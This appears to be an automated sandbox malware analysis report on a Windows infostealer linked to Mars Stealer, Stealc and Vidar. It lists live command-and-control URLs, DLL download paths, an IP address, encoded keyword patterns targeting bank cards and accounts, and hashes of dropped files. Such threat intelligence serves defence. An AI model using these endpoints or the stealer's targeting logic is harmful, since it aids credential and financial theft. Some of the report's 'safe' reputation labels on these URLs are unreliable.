                            https://shaffatta.com/8s/pYJeC4VJbw.exe, 00000000.00000003.2526693387.0000000002E3E000.00000004.00000020.00020000.00000000.sdmp, pYJeC4VJbw.exe, 00000000.00000003.2526535738.0000000002E3E000.00000004.00000020.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            https://shaffatta.com/fdca69ae739b4897.php&pYJeC4VJbw.exe, 00000000.00000003.2526693387.0000000002E3E000.00000004.00000020.00020000.00000000.sdmp, pYJeC4VJbw.exe, 00000000.00000003.2526535738.0000000002E3E000.00000004.00000020.00020000.00000000.sdmpfalse
                            • 9%, Virustotal, Browse
                            • Avira URL Cloud: safe
                            		unknown
                            https://shaffatta.com/fdca69ae739b4897.phpiYW4qLCpjYXJkcyosKmJhbmtzKiwqY3Z2KiwqY3ZjKiwqYWNjb3VudCosKpYJeC4VJbw.exe, 00000000.00000002.2882938021.000000000044B000.00000040.00000001.01000000.00000003.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            https://shaffatta.com/fdca69ae739b4897.phpmple-storage.jsoncoOaYpYJeC4VJbw.exe, 00000000.00000002.2884861560.0000000002E26000.00000004.00000020.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            https://shaffatta.com/)pYJeC4VJbw.exe, 00000000.00000002.2884861560.0000000002E26000.00000004.00000020.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            https://shaffatta.com/d32e011d2eaa85a0/mozglue.dll8pYJeC4VJbw.exe, 00000000.00000002.2884861560.0000000002E09000.00000004.00000020.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            https://shaffatta.com/32e011d2eaa85a0/nss3.dllcpYJeC4VJbw.exe, 00000000.00000002.2895207403.000000001D410000.00000004.00000020.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchpYJeC4VJbw.exe, 00000000.00000002.2895207403.000000001D410000.00000004.00000020.00020000.00000000.sdmp, GIJKKKFC.0.drfalse
                              		high
                              https://shaffatta.com/1pYJeC4VJbw.exe, 00000000.00000002.2895207403.000000001D410000.00000004.00000020.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              		unknown
                              https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17chost.exepYJeC4VJbw.exe, 00000000.00000002.2882938021.000000000044B000.00000040.00000001.01000000.00000003.sdmpfalse
                                		high
                                https://shaffatta.com/5pYJeC4VJbw.exe, 00000000.00000002.2895207403.000000001D410000.00000004.00000020.00020000.00000000.sdmpfalse
                                • 11%, Virustotal, Browse
                                • Avira URL Cloud: safe
                                		unknown
                                https://shaffatta.com/fdca69ae739b4897.php7s&pYJeC4VJbw.exe, 00000000.00000003.2526693387.0000000002E3E000.00000004.00000020.00020000.00000000.sdmp, pYJeC4VJbw.exe, 00000000.00000003.2526535738.0000000002E3E000.00000004.00000020.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                		unknown
                                https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016.exepYJeC4VJbw.exe, 00000000.00000002.2882938021.000000000044B000.00000040.00000001.01000000.00000003.sdmpfalse
                                  		high
                                  https://shaffatta.com/d32e011d2eaa85a0/mozglue.dll)pYJeC4VJbw.exe, 00000000.00000002.2895207403.000000001D4F0000.00000004.00000020.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  		unknown
                                  https://shaffatta.com/d32e011d2eaa85a0/softokn3.dllxpYJeC4VJbw.exe, 00000000.00000002.2895207403.000000001D4FF000.00000004.00000020.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  		unknown
                                  https://shaffatta.com/fdca69ae739b4897.phpUspYJeC4VJbw.exe, 00000000.00000003.2526693387.0000000002E3E000.00000004.00000020.00020000.00000000.sdmp, pYJeC4VJbw.exe, 00000000.00000003.2526535738.0000000002E3E000.00000004.00000020.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  		unknown
                                  http://www.sqlite.org/copyright.html.pYJeC4VJbw.exe, 00000000.00000002.2903413122.0000000061ED3000.00000004.00001000.00020000.00000000.sdmp, pYJeC4VJbw.exe, 00000000.00000002.2895334222.000000001D511000.00000004.00000020.00020000.00000000.sdmpfalse
                                    		high
                                    https://cdn.epnaclpYJeC4VJbw.exe, 00000000.00000002.2895207403.000000001D410000.00000004.00000020.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    		unknown
                                    https://shaffatta.com/fdca69ae739b4897.php8s/pYJeC4VJbw.exe, 00000000.00000002.2884861560.0000000002E26000.00000004.00000020.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    		unknown
                                    https://shaffatta.com/d32e011d2eaa85a0/sqlite3.dllHpYJeC4VJbw.exe, 00000000.00000002.2884861560.0000000002E09000.00000004.00000020.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    		unknown
                                    https://shaffatta.com/fdca69ae739b4897.phpapYJeC4VJbw.exe, 00000000.00000002.2884861560.0000000002E26000.00000004.00000020.00020000.00000000.sdmpfalse
                                    • 9%, Virustotal, Browse
                                    • Avira URL Cloud: safe
                                    		unknown
                                    http://www.mozilla.com/en-US/blocklist/pYJeC4VJbw.exe, pYJeC4VJbw.exe, 00000000.00000002.2903578339.000000006D00D000.00000002.00000001.01000000.00000008.sdmp, mozglue[1].dll.0.dr, mozglue.dll.0.drfalse
                                      		high
                                      https://mozilla.org0/freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.drfalse
                                      • URL Reputation: safe
                                      		unknown
                                      https://www.google.com/images/branding/product/ico/googleg_lodp.icoGIJKKKFC.0.drfalse
                                        		high
                                        https://shaffatta.com/fdca69ae739b4897.phpyspYJeC4VJbw.exe, 00000000.00000003.2526693387.0000000002E3E000.00000004.00000020.00020000.00000000.sdmp, pYJeC4VJbw.exe, 00000000.00000003.2526535738.0000000002E3E000.00000004.00000020.00020000.00000000.sdmpfalse
                                        • Avira URL Cloud: safe
                                        		unknown
                                        https://shaffatta.com/d32e011d2eaa85a0/softokn3.dllFpYJeC4VJbw.exe, 00000000.00000002.2895207403.000000001D4FF000.00000004.00000020.00020000.00000000.sdmpfalse
                                        • Avira URL Cloud: safe
                                        		unknown
                                        https://shaffatta.com/d32e011d2eaa85a0/msvcp140.dlllpYJeC4VJbw.exe, 00000000.00000002.2884861560.0000000002E09000.00000004.00000020.00020000.00000000.sdmpfalse
                                        • 12%, Virustotal, Browse
                                        • Avira URL Cloud: safe
                                        		unknown
                                        https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=GIJKKKFC.0.drfalse
                                          		high
                                          https://shaffatta.com/GHCGHCBFHJJKKJEHJEHJEHpYJeC4VJbw.exe, 00000000.00000002.2895207403.000000001D410000.00000004.00000020.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          https://shaffatta.com/ozglue.dllpYJeC4VJbw.exe, 00000000.00000002.2895207403.000000001D410000.00000004.00000020.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          https://shaffatta.com/fdca69ae739b4897.phption:pYJeC4VJbw.exe, 00000000.00000002.2882938021.000000000044B000.00000040.00000001.01000000.00000003.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016pYJeC4VJbw.exe, 00000000.00000003.2585700635.000000002349D000.00000004.00000020.00020000.00000000.sdmp, pYJeC4VJbw.exe, 00000000.00000002.2882938021.000000000044B000.00000040.00000001.01000000.00000003.sdmpfalse
                                            		high
                                            https://shaffatta.com/espYJeC4VJbw.exe, 00000000.00000002.2895207403.000000001D410000.00000004.00000020.00020000.00000000.sdmpfalse
                                            • Avira URL Cloud: safe
                                            		unknown
                                            https://www.ecosia.org/newtab/pYJeC4VJbw.exe, 00000000.00000002.2895207403.000000001D410000.00000004.00000020.00020000.00000000.sdmp, GIJKKKFC.0.drfalse
                                              		high
                                              https://shaffatta.com/fatta.com/d32e011d2eaa85a0/nss3.dll/pYJeC4VJbw.exe, 00000000.00000002.2895207403.000000001D410000.00000004.00000020.00020000.00000000.sdmpfalse
                                              • Avira URL Cloud: safe
                                              		unknown
                                              https://shaffatta.com/fatta.com/d32e011d2eaa85a0/nss3.dllpYJeC4VJbw.exe, 00000000.00000002.2895207403.000000001D410000.00000004.00000020.00020000.00000000.sdmpfalse
                                              • Avira URL Cloud: safe
                                              		unknown
                                              https://shaffatta.com/fdca69ae739b4897.phpipYJeC4VJbw.exe, 00000000.00000002.2884861560.0000000002E09000.00000004.00000020.00020000.00000000.sdmpfalse
                                              • Avira URL Cloud: safe
                                              		unknown
                                              https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-brIDAKJKEHDBGHIDHIEHDBAAFHJK.0.drfalse
                                                		high
                                                https://cdn.eppYJeC4VJbw.exe, 00000000.00000002.2895207403.000000001D410000.00000004.00000020.00020000.00000000.sdmpfalse
                                                • Avira URL Cloud: safe
                                                		unknown
                                                https://shaffatta.com/HspYJeC4VJbw.exe, 00000000.00000003.2526693387.0000000002E3E000.00000004.00000020.00020000.00000000.sdmp, pYJeC4VJbw.exe, 00000000.00000003.2526535738.0000000002E3E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                • Avira URL Cloud: safe
                                                		unknown
                                                https://ac.ecosia.org/autocomplete?q=GIJKKKFC.0.drfalse
                                                  		high
                                                  https://shaffatta.compYJeC4VJbw.exe, 00000000.00000002.2884824643.0000000002DBB000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  https://shaffatta.com/cpYJeC4VJbw.exe, 00000000.00000002.2884861560.0000000002E09000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  https://shaffatta.com/fatta.com/pYJeC4VJbw.exe, 00000000.00000002.2895207403.000000001D410000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  https://shaffatta.com/amDatapYJeC4VJbw.exe, 00000000.00000002.2895207403.000000001D410000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  https://shaffatta.com/3r:pYJeC4VJbw.exe, 00000000.00000002.2884861560.0000000002E26000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  https://shaffatta.com/32e011d2eaa85a0/nss3.dllpYJeC4VJbw.exe, 00000000.00000002.2895207403.000000001D410000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  https://shaffatta.com/d32e011d2eaa85a0/nss3.dllppYJeC4VJbw.exe, 00000000.00000002.2895207403.000000001D410000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  https://shaffatta.com/fdca69ae739b4897.phpGspYJeC4VJbw.exe, 00000000.00000002.2884861560.0000000002E26000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  https://support.mozilla.orgIDAKJKEHDBGHIDHIEHDBAAFHJK.0.drfalse
                                                    		high
                                                    https://shaffatta.com/d32e011d2eaa85a0/nss3.dllnpYJeC4VJbw.exe, 00000000.00000002.2895207403.000000001D410000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=GIJKKKFC.0.drfalse
                                                      		high
                                                      https://shaffatta.com/fdca69ae739b4897.phpCoinomipYJeC4VJbw.exe, 00000000.00000002.2884861560.0000000002E26000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      • Avira URL Cloud: safe
                                                      		unknown
                                                      https://shaffatta.comCpYJeC4VJbw.exe, 00000000.00000002.2884824643.0000000002DBB000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      • Avira URL Cloud: safe
                                                      		unknown

                                                      World Map of Contacted IPs

                                                      • No. of IPs < 25%
                                                      • 25% < No. of IPs < 50%
                                                      • 50% < No. of IPs < 75%
                                                      • 75% < No. of IPs

                                                      Public IPs

                                                      IPDomainCountryFlagASNASN NameMalicious
                                                      168.119.248.46
                                                      		shaffatta.comGermany
                                                      		24940HETZNER-ASDEfalse

                                                      General Information

                                                      Joe Sandbox version:40.0.0 Tourmaline
                                                      Analysis ID:1435882
                                                      Start date and time:2024-05-03 11:19:09 +02:00
                                                      Joe Sandbox product:CloudBasic
                                                      Overall analysis duration:0h 7m 14s
                                                      Hypervisor based Inspection enabled:false
                                                      Report type:full
                                                      Cookbook file name:default.jbs
                                                      Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                      Number of analysed new started processes analysed:5
                                                      Number of new started drivers analysed:0
                                                      Number of existing processes analysed:0
                                                      Number of existing drivers analysed:0
                                                      Number of injected processes analysed:0
                                                      Technologies:
                                                      • HCA enabled
                                                      • EGA enabled
                                                      • AMSI enabled
                                                      Analysis Mode:default
                                                      Analysis stop reason:Timeout
                                                      Sample name:pYJeC4VJbw.exe
                                                      renamed because original name is a hash value
                                                      Original Sample Name:14c3db1bdba407c23f0e80bbfdd6db0f.exe
                                                      Detection:MAL
                                                      Classification:mal100.troj.spyw.evad.winEXE@1/29@1/1
                                                      EGA Information:
                                                      • Successful, ratio: 100%
                                                      HCA Information:
                                                      • Successful, ratio: 100%
                                                      • Number of executed functions: 61
                                                      • Number of non-executed functions: 116
                                                      Cookbook Comments:
                                                      • Found application associated with file extension: .exe

                                                      Warnings

                                                      • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                                                      • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                      • HTTPS proxy raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                      • Not all processes where analyzed, report is missing behavior information
                                                      • Report size exceeded maximum capacity and may have missing disassembly code.
                                                      • Report size getting too big, too many NtOpenKeyEx calls found.
                                                      • Report size getting too big, too many NtQueryAttributesFile calls found.
                                                      • Report size getting too big, too many NtQueryValueKey calls found.

                                                      Simulations

                                                      Behavior and APIs

                                                      No simulations

                                                      Joe Sandbox View / Context

                                                      IPs

                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                      168.119.248.46Wb9LZ5Sn1l.exeGet hashmaliciousMars Stealer, Stealc, VidarBrowse
                                                        c4RAHq3BNl.exeGet hashmaliciousMars Stealer, Stealc, VidarBrowse
                                                          34cFFMVY3B.exeGet hashmaliciousMars Stealer, Stealc, VidarBrowse

                                                            Domains

                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                            shaffatta.comWb9LZ5Sn1l.exeGet hashmaliciousMars Stealer, Stealc, VidarBrowse
                                                            • 168.119.248.46
                                                            c4RAHq3BNl.exeGet hashmaliciousMars Stealer, Stealc, VidarBrowse
                                                            • 168.119.248.46
                                                            34cFFMVY3B.exeGet hashmaliciousMars Stealer, Stealc, VidarBrowse
                                                            • 168.119.248.46

                                                            ASNs

                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                            HETZNER-ASDEWb9LZ5Sn1l.exeGet hashmaliciousMars Stealer, Stealc, VidarBrowse
                                                            • 168.119.248.46
                                                            ydwVTacfTdGet hashmaliciousUnknownBrowse
                                                            • 95.216.216.96
                                                            c4RAHq3BNl.exeGet hashmaliciousMars Stealer, Stealc, VidarBrowse
                                                            • 168.119.248.46
                                                            file.exeGet hashmaliciousVidarBrowse
                                                            • 95.217.245.42
                                                            c8sDO7umrx.exeGet hashmaliciousCMSBruteBrowse
                                                            • 49.13.210.40
                                                            http://event.strategiedirect.comGet hashmaliciousUnknownBrowse
                                                            • 167.233.13.125
                                                            Jkxkt.exeGet hashmaliciousUnknownBrowse
                                                            • 88.99.137.18
                                                            Jkxkt.exeGet hashmaliciousUnknownBrowse
                                                            • 88.99.137.18
                                                            U8uFcjIjAR.exeGet hashmaliciousLummaC, Amadey, Glupteba, LummaC Stealer, Mars Stealer, PureLog Stealer, RedLineBrowse
                                                            • 116.202.23.44
                                                            yZcecBUXN7.exeGet hashmaliciousFormBookBrowse
                                                            • 148.251.36.121

                                                            JA3 Fingerprints

                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                            37f463bf4616ecd445d4a1937da06e19586 R1 M-LINE - GEORGIA 03.05.2024.exeGet hashmaliciousGuLoader, RemcosBrowse
                                                            • 168.119.248.46
                                                            a.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                            • 168.119.248.46
                                                            a.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                            • 168.119.248.46
                                                            Wb9LZ5Sn1l.exeGet hashmaliciousMars Stealer, Stealc, VidarBrowse
                                                            • 168.119.248.46
                                                            SecuriteInfo.com.Variant.Doina.72042.21290.22220.exeGet hashmaliciousUnknownBrowse
                                                            • 168.119.248.46
                                                            c4RAHq3BNl.exeGet hashmaliciousMars Stealer, Stealc, VidarBrowse
                                                            • 168.119.248.46
                                                            file.exeGet hashmaliciousVidarBrowse
                                                            • 168.119.248.46
                                                            JpFr8C6ljd.dllGet hashmaliciousUnknownBrowse
                                                            • 168.119.248.46
                                                            JpFr8C6ljd.dllGet hashmaliciousUnknownBrowse
                                                            • 168.119.248.46
                                                            file.exeGet hashmaliciousSmokeLoaderBrowse
                                                            • 168.119.248.46

                                                            Dropped Files

                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                            C:\ProgramData\freebl3.dllWb9LZ5Sn1l.exeGet hashmaliciousMars Stealer, Stealc, VidarBrowse
                                                              c4RAHq3BNl.exeGet hashmaliciousMars Stealer, Stealc, VidarBrowse
                                                                exDbnS3M12.exeGet hashmaliciousMars Stealer, Stealc, VidarBrowse
                                                                  qa4Ulla1BY.exeGet hashmaliciousMars Stealer, Stealc, VidarBrowse
                                                                    U8uFcjIjAR.exeGet hashmaliciousLummaC, Amadey, Glupteba, LummaC Stealer, Mars Stealer, PureLog Stealer, RedLineBrowse
                                                                      JlvRdFpwOD.exeGet hashmaliciousMars Stealer, PureLog Stealer, RedLine, SectopRAT, Stealc, Vidar, zgRATBrowse
                                                                        file.exeGet hashmaliciousLummaC, GCleaner, Glupteba, LummaC Stealer, Mars Stealer, PureLog Stealer, RedLineBrowse
                                                                          file.exeGet hashmaliciousVidarBrowse
                                                                            0dN59ZIkEM.exeGet hashmaliciousVidarBrowse
                                                                              34cFFMVY3B.exeGet hashmaliciousMars Stealer, Stealc, VidarBrowse
                                                                                C:\ProgramData\mozglue.dllWb9LZ5Sn1l.exeGet hashmaliciousMars Stealer, Stealc, VidarBrowse
                                                                                  c4RAHq3BNl.exeGet hashmaliciousMars Stealer, Stealc, VidarBrowse
                                                                                    exDbnS3M12.exeGet hashmaliciousMars Stealer, Stealc, VidarBrowse
                                                                                      qa4Ulla1BY.exeGet hashmaliciousMars Stealer, Stealc, VidarBrowse
                                                                                        U8uFcjIjAR.exeGet hashmaliciousLummaC, Amadey, Glupteba, LummaC Stealer, Mars Stealer, PureLog Stealer, RedLineBrowse
                                                                                          JlvRdFpwOD.exeGet hashmaliciousMars Stealer, PureLog Stealer, RedLine, SectopRAT, Stealc, Vidar, zgRATBrowse
                                                                                            file.exeGet hashmaliciousLummaC, GCleaner, Glupteba, LummaC Stealer, Mars Stealer, PureLog Stealer, RedLineBrowse
                                                                                              file.exeGet hashmaliciousVidarBrowse
                                                                                                0dN59ZIkEM.exeGet hashmaliciousVidarBrowse
                                                                                                  34cFFMVY3B.exeGet hashmaliciousMars Stealer, Stealc, VidarBrowse

                                                                                                    Created / dropped Files

                                                                                                    C:\ProgramData\AAEGHJKJ

                                                                                                    Download File
                                                                                                    Process:C:\Users\user\Desktop\pYJeC4VJbw.exe
                                                                                                    File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                                    Category:dropped
                                                                                                    Size (bytes):114688
                                                                                                    Entropy (8bit):0.9746603542602881
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                                    MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                                    SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                                    SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                                    SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                                    Malicious:false
                                                                                                    Reputation:high, very likely benign file
                                                                                                    Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                    C:\ProgramData\AIXACVYBSB.docx

                                                                                                    Download File
                                                                                                    Process:C:\Users\user\Desktop\pYJeC4VJbw.exe
                                                                                                    File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):1026
                                                                                                    Entropy (8bit):4.690067217069288
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:12:wSQanHEC73FqjThUbJwuUn5qPyd2whRZfZOaH5KrqXzJI/y5bjbVMmRYAPL8fx7T:wHu73FWhUNwzqq2OfX82JdHRNPLcxdl
                                                                                                    MD5:4E32787C3D6F915D3CB360878174E142
                                                                                                    SHA1:57FF84FAEDF66015F2D79E1BE72A29D7B5643F47
                                                                                                    SHA-256:2BCD2A46D2DCED38DE96701E6D3477D8C9F4456FFAE5135C0605C8434BA60269
                                                                                                    SHA-512:CEC75D7CCFA70705732826C202D144A8AC913E7FCFE0D9B54F6A0D1EEC3253B6DEFFB91E551586DA15F56BA4DE8030AC23EE28B16BB80D1C5F1CB6BECF9C21BE
                                                                                                    Malicious:false
                                                                                                    Reputation:moderate, very likely benign file
                                                                                                    Preview:AIXACVYBSBCZDJMZUDVNECMFSGJSAOAIXCJFDPHQJVUANUFFPQXVYJRUGYPJGKEJNXCBTXARAETAKFTJKVLIZEXLMOAPVEZRZZUIRDUKSPZRBPINNEKLCLXBHFZMBRJTUJZTRCGQGFRQCEVPUBAAPBHBTYYHDJZHHPMFAKXVJPQRQCRUFYPMNUCRRQOYXYEHXQEHWHFLZSBMLRRZFLLYUQLADTKEDXVDLKLPZTTCNAXMXPSTCHQKWMSRPNRZGULFHOTUOYUSIVJEHUYPRYGESSFFMBWDPFRMTVBZEHTJSPRMDJISAZPMEWNGPGIXXTDNHCOBSXAWEFWRZNECKZGORELWMEPSAPLSTZZPUKXURSKTFSUSFEZMXMAIMRJZNGCVKLOHPVMZEIXIISXVMQHQTSADYWZQSWYVJHHONOOSZPQVWIUFMVXBXYCJOMERCQSVXERFAOOENLKARQGTECAIXOXEZPFDFJHYFCKLADMCWYOMCITRHMECVVVNPNTSRXYGYRKZUTOFNBMHDZWYHPYLTWEIGWOIGBTHWYGIXBCUDYMZMTZNYQMZLMXKPNFZDUEXXQLFJZZZVOPBEZKTKTJCTNUPRCNNGCPTIHKPTGBJLGUENNUGTZVMZJGQGUVBRLOJZECBLINEKGSIRFWZPWMVYJNEPWGYIAHKMJRBZMRVIBPONMHBDQZYFBHDDMYBZZAFEPAQFFUPIGGYNSPVXUWNNCWAUZXAGCATPNHNNYICDCRMTKRODUCDDFZKHLISLVOIFZPDTOSIEREFHYEWUBJKJRWXMZUGCPUXCPEXUQPWTSKEYSDPEICDQMMKUKJLDNQEHQQCYKRMWOUSJVTVSZJTFZCDVNUMEIZFWDNWCNCSCHBYNKRUSXPVMRIHGXDUPKXMZUIELSRXMZAEUNCCYZTEYLUYYRNSFUTHFESJOLGKJVGGNVJKSFSETAIHYOMLBOPRYAHSCATJUXNTWVZPEMECBVVHKHDELQRTQBEBXPJJ

                                                                                                    C:\ProgramData\AIXACVYBSB.xlsx

                                                                                                    Download File
                                                                                                    Process:C:\Users\user\Desktop\pYJeC4VJbw.exe
                                                                                                    File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):1026
                                                                                                    Entropy (8bit):4.690067217069288
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:12:wSQanHEC73FqjThUbJwuUn5qPyd2whRZfZOaH5KrqXzJI/y5bjbVMmRYAPL8fx7T:wHu73FWhUNwzqq2OfX82JdHRNPLcxdl
                                                                                                    MD5:4E32787C3D6F915D3CB360878174E142
                                                                                                    SHA1:57FF84FAEDF66015F2D79E1BE72A29D7B5643F47
                                                                                                    SHA-256:2BCD2A46D2DCED38DE96701E6D3477D8C9F4456FFAE5135C0605C8434BA60269
                                                                                                    SHA-512:CEC75D7CCFA70705732826C202D144A8AC913E7FCFE0D9B54F6A0D1EEC3253B6DEFFB91E551586DA15F56BA4DE8030AC23EE28B16BB80D1C5F1CB6BECF9C21BE
                                                                                                    Malicious:false
                                                                                                    Reputation:moderate, very likely benign file
                                                                                                    Preview:AIXACVYBSBCZDJMZUDVNECMFSGJSAOAIXCJFDPHQJVUANUFFPQXVYJRUGYPJGKEJNXCBTXARAETAKFTJKVLIZEXLMOAPVEZRZZUIRDUKSPZRBPINNEKLCLXBHFZMBRJTUJZTRCGQGFRQCEVPUBAAPBHBTYYHDJZHHPMFAKXVJPQRQCRUFYPMNUCRRQOYXYEHXQEHWHFLZSBMLRRZFLLYUQLADTKEDXVDLKLPZTTCNAXMXPSTCHQKWMSRPNRZGULFHOTUOYUSIVJEHUYPRYGESSFFMBWDPFRMTVBZEHTJSPRMDJISAZPMEWNGPGIXXTDNHCOBSXAWEFWRZNECKZGORELWMEPSAPLSTZZPUKXURSKTFSUSFEZMXMAIMRJZNGCVKLOHPVMZEIXIISXVMQHQTSADYWZQSWYVJHHONOOSZPQVWIUFMVXBXYCJOMERCQSVXERFAOOENLKARQGTECAIXOXEZPFDFJHYFCKLADMCWYOMCITRHMECVVVNPNTSRXYGYRKZUTOFNBMHDZWYHPYLTWEIGWOIGBTHWYGIXBCUDYMZMTZNYQMZLMXKPNFZDUEXXQLFJZZZVOPBEZKTKTJCTNUPRCNNGCPTIHKPTGBJLGUENNUGTZVMZJGQGUVBRLOJZECBLINEKGSIRFWZPWMVYJNEPWGYIAHKMJRBZMRVIBPONMHBDQZYFBHDDMYBZZAFEPAQFFUPIGGYNSPVXUWNNCWAUZXAGCATPNHNNYICDCRMTKRODUCDDFZKHLISLVOIFZPDTOSIEREFHYEWUBJKJRWXMZUGCPUXCPEXUQPWTSKEYSDPEICDQMMKUKJLDNQEHQQCYKRMWOUSJVTVSZJTFZCDVNUMEIZFWDNWCNCSCHBYNKRUSXPVMRIHGXDUPKXMZUIELSRXMZAEUNCCYZTEYLUYYRNSFUTHFESJOLGKJVGGNVJKSFSETAIHYOMLBOPRYAHSCATJUXNTWVZPEMECBVVHKHDELQRTQBEBXPJJ

                                                                                                    C:\ProgramData\CBKJEGCBKKJECBGCGDBAKJEBAA

                                                                                                    Download File
                                                                                                    Process:C:\Users\user\Desktop\pYJeC4VJbw.exe
                                                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 11, database pages 7, cookie 0x3, schema 4, UTF-8, version-valid-for 11
                                                                                                    Category:dropped
                                                                                                    Size (bytes):28672
                                                                                                    Entropy (8bit):2.5793180405395284
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:96:/xealJiylsMjLslk5nYPphZEhcR2hO2mOeVgN8tmKqWkh3qzRk4PeOhZ3hcR1hOI:/xGZR8wbtxq5uWRHKloIN7YItnb6Ggz
                                                                                                    MD5:41EA9A4112F057AE6BA17E2838AEAC26
                                                                                                    SHA1:F2B389103BFD1A1A050C4857A995B09FEAFE8903
                                                                                                    SHA-256:CE84656EAEFC842355D668E7141F84383D3A0C819AE01B26A04F9021EF0AC9DB
                                                                                                    SHA-512:29E848AD16D458F81D8C4F4E288094B4CFC103AD99B4511ED1A4846542F9128736A87AAC5F4BFFBEFE7DF99A05EB230911EDCE99FEE3877DEC130C2781962103
                                                                                                    Malicious:false
                                                                                                    Reputation:high, very likely benign file
                                                                                                    Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                    C:\ProgramData\DTBZGIOOSO.docx

                                                                                                    Download File
                                                                                                    Process:C:\Users\user\Desktop\pYJeC4VJbw.exe
                                                                                                    File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):1026
                                                                                                    Entropy (8bit):4.705615236042988
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:24:B65nSK3I37xD9qo21p9G7ILc3pkowOeuiyJRdt7fXzyxu3f7Lj8X2:B65SK3Xx1OXpkowOeMJR/fzeYX8X2
